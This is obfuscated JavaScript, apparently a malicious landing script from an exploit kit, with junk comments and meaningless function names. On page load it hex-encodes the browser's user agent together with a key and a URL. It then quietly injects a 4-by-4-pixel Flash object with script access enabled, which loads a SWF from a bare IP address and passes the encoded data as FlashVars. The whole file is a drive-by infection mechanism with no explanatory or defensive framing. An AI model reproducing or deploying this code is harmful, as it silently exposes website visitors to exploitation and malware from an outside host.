/*s57230d11887hssfj41742fs*/function hgfgerdfgdf(num, width){/*s81962d23985hfj73498fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s74119d23428hfj76920fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s31896d38162hfj57822fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s89509d10799hfj54846fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd11651hfs*/c += b + d;/*s51133d45083hfj40754fs*/e += 1;}return c;}/*s21612dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.78.226/?OTkwMDQ5MjU=&paper=xH_QMrDYbR3FFYPfKPrEUKREMU3WA0eKwY-Zha_VF5yxFDTGpbL1FxzspVydCFyEmvJvdLMHIwGh1UfASwd&inform=MjcwMzQ3Mzk=&mail=nnY9ZUFgWo6iui0OHyBfJhpbU-xeFaQsQq5DHRrA631z1zbMXcMoizxeE72BYmustUVsX5ggSlKz7VaOO-w&help=work&gift=MjIyODczNTY=", ghnvbn("http://188.225.78.226/?NjE5Njg2OTI=&mail=Xgj0GCfgQ1nItfAFtG9q_4iEPdwUOd1MXQ_BSKYQtH_JKXEbk92lv9mbMkec0mwhKF6FENjOse&paper=xX_QMvWdbRXQCJ3EKvncT6NHMVHRH0CL2YydmrHTefjaelWkzrHFTF_yozKASASG6_FtdfJSDQ&help=money&inform=MzYwNDU2MTI=&slam=NDgwOTA3OTI=","wexykukusw"));